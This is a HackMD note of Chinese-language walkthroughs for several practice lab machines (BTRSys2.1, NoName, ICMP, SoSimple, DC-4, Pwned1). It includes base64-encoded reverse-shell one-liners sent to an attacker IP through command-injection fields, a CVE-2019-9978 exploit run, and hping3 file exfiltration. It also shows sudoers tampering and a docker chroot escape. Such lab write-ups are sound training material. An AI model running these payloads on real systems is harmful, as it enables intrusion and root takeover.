Try   HackMD
echo *

BTRSys2.1

21 22 80 port 開著,並且ftp 允許anonymous登入,登入後啥都沒有,並且上傳不了任何東西,透過wpscan得出有admin等user 後來嘗試弱密碼admin/admin可以登入成功,原本查看plugin發現其中一個plugin可以成功LFI並且嘗試讀取/etc/passwd有成功,試過各種方法讀取log都失敗,後來直接上傳php reverse shell 上去。

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

提權的部分,嘗試了linux 可以用的套路後解決不了,
cat wp-config.php得到mysql 的username、password
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

執行mysql

mysql -u root -h localhost -p

show databases;

use wordpress;

show tables;

SELECT * FROM wp_users LIMIT 5;

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

看到root hash ,懶的爆破直接拿去crackstation得知root password roottoor
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

NoName

一開始掃前20 top ports 只開22 port ,網頁打開

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

只有這樣甚麼都沒有,做一次全面性的端口掃描、網站目錄枚舉,
還是只開80 port ,找到superamdin.php。

┌──(kali㉿LAPTOP-FKRJU4AD)-[~]
└─$ gobuster dir -u  http://192.168.157.15/ -w /usr/share/wordlists/dirb/big.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.157.15/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/admin                (Status: 200) [Size: 417]
/index.php            (Status: 200) [Size: 201]
/server-status        (Status: 403) [Size: 279]
/superadmin.php       (Status: 200) [Size: 152]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================

網頁打開是個明顯的command injection,經過幾次嘗試後|l\s可以成功執行出來

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

這邊用|ca\t su*可以看到網頁具體的限制

<?php
   if (isset($_POST['submitt']))
{
   	$word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
   	$pinged=$_POST['pinger'];
   	$newStr = str_replace($word, "", $pinged);
   	if(strcmp($pinged, $newStr) == 0)
		{
		    $flag=1;
		}
       else
		{
		   $flag=0;
		}
}

if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";
}
?>

這裡用|echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xOTQvNDQ0NCAwPiYx" | base64 -d | bash其中base64 的部分是sh -i >& /dev/tcp/192.168.45.194/4444 0>&1成功拿到reverse shell

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

之後再找suid時發現有find可以利用
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

ICMP

基本的port scan ,22 80 port open
之後網頁打開看了下沒啥好打的,搜版本發現有RCE漏洞

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

提權部分又到了討厭的通靈部分,嘗試過一些基本題權方法都不行,最後去看一下發現有奇怪的資料夾只能執行不能讀,讀了reminder裡面寫

crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?

通靈1猜它在 ./devel/crypt.php

www-data@icmp:/home/fox$ cat ./devel/crypt.php
cat ./devel/crypt.php
<?php
echo crypt('BUHNIJMONIBUVCYTTYVGBUHJNI','da');
?>

通靈2這就是fox 的user password

www-data@icmp:/home/fox$ ls -al
ls -al                                         
total 20                                        
drwxr-xr-x 3 root root 4096 Dec  3  2020 .
drwxr-xr-x 3 root root 4096 Dec  3  2020 ..
lrwxrwxrwx 1 root root    9 Dec  3  2020 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4096 Dec  3  2020 devel
-rw-r--r-- 1 fox  fox    33 Aug 19 15:04 local.txt
-rw-r--r-- 1 root root   78 Dec  3  2020 reminder

之後用ssh 連進去找了一下sudo -l發現有hping3,在gtfobins發現可以利用
使用如下:
開兩個session

$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe

--listen signature->HPING3 listen mode, using this option hping3 waits for packet that contain signature and dump from signature end to packet's end

$ sudo /hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/proof.txt

--sign signature -> This is for packet identity,This is used to add a signature to the data payload of sent packets. This signature can be any arbitrary string of characters, and it will be included in the packet's data section.
-d ->data size

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Loly

port scan result 80 port open (noly)
之後用找到目錄wordpress 用wpscan 找到user Loly
password fernando

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

SoSimple

port scan result 22 80 port open
也是一樣找到wordpress目錄用wpscan

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

搜尋social-warfare找到可以RCE,參考了一下這個github 上的exploit,但是我的PoC 是

payload.txt

<pre>system('echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yNDQvNDQ0NCAwPiYx" | base64 -d | bash')</pre>

在本機開一個http.server,再透過上面的exploit 執行

python2 CVE-2019-9978.py -t http://192.168.168.78/wordpress/ --payload-uri http://192.168.45.244:8000/payload.txt

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

之後因為在一開始做wpscan 有順便找到user max,在上面的圖片也有max user合理懷疑兩個的password會是一樣用wpscan 找到password opensesame
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

但是用ssh 連進去失敗,之後再max 家目錄找到id_rsa,利用後成功登入
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

sudo -l之後可以看到/usr/sbin/service/可以在不需要密碼的情況下以steven的身分執行,拿到steven shll 後sudo -l看到/opt/tools/server-health.sh可以被利用,原本cat 那個檔案但是檔案不存在
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

之後自己把/bin/bash寫進去server-health.sh用sudo 去執行就拿到root 了
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

DC-4

基本的port scan 22 80 port open,去戳網站是一個login page,不像是有slqi 的跡象,爆破網站目錄也沒有收穫,就只好去爆破登入,嘗試admin/happy登入成功

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

登入後可以看到一個明顯的command injection 頁面
Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

修改封包,成功拿到reverse sehll。

radio=echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx" | base64 -d | bash &submit=Run

image
其中在user jim 中可以找到old-passwords.bak裡面有許多密碼把它copy出來爆破看看
image
根據那個password list 和已知的user 建立兩個字典,用hydra 爆看看有沒有機會
image
以jim的身分登入進去後,盡可能的提權,沒用,檢查mail看到另一位user charles 的 password
image
切換為charlessudo -l可以看到/usr/bin/teehee可以無密碼使用,猜測這個功能應該是tee,GTFOBins查了一下tee,發現這功能可以寫入,於是把charles寫入/etc/sudoers讓他也有root 的身分

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo /usr/bin/teehee -a /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ su root
Password:
su: Authentication failure
charles@dc-4:~$ sudo su
[sudo] password for charles:
root@dc-4:/home/charles# cat /root/proof.txt
e4951b05703a5c6287b20ab096c6c0fe
root@dc-4:/home/charles#

image

Pwned1

21,22,80 port open 爆破目錄超級久,找到/hidden_text,裡面有一個檔案secret.dic點進去後可以看到更多的目錄,其中只有/pwned.vuln可以訪問

image

到了該目錄,可以看到一個輸入框初步測試不存在sqli

image

用burpsuite抓包可以看到在respone 含有php code

image

可惜寫在裡面的帳密不是網頁登入的帳密,反而是通靈到ftp 的username & password
ftp 連線進去後可以看到 share directory 進去後有id_rsa,和note.txt在裡面把它下載下來登入,並且用note.txt裡面提到的人名 ariana 登入

┌──(kali㉿G)-[/tmp]
└─$ cat note.txt
Wow you are here

ariana won't happy about this note

sorry ariana :(

┌──(kali㉿G)-[/tmp]
└─$ sudo chmod 600 id_rsa
[sudo] password for kali:

┌──(kali㉿G)-[/tmp]
└─$ ssh -i id_rsa ariana@192.168.171.95
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ariana@pwned:~$ cat local.txt
59cd03d49cee9d05b419e4b56444da35
ariana@pwned:~$

提權的部分 sudo -l 可以看到 (selena) NOPASSWD: /home/messenger.sh可以利用

ariana@pwned:/home$ cat messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null
                echo ""
echo "Message sent to $name :) "
                echo ""

可以注意到這個shell script 的 $msg 是可以直接被執行的,先水平提權到 selena

ariana@pwned:/home$ sudo -u selena ./messenger.sh

Welcome to linux.messenger


ariana:
selena:
ftpuser:

Enter username to send message : asdf

Enter message for asdf :/bin/bash

Sending message to asdf
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
python3 -c 'import pty;pty.spawn("/bin/bash")'
selena@pwned:/home$

經過了基本的提權方法都無效後反覆觀察發現 docker 跟我們在同一個群組,利用 gtfobins提權

selena@pwned:/home$ id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
selena@pwned:/home$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# cat /root/proof.txt
5afb73776252b8a2e48a250cc2f172c1
#
Last changed by 
www.chengyunpu.com
0
71
Published on HackMD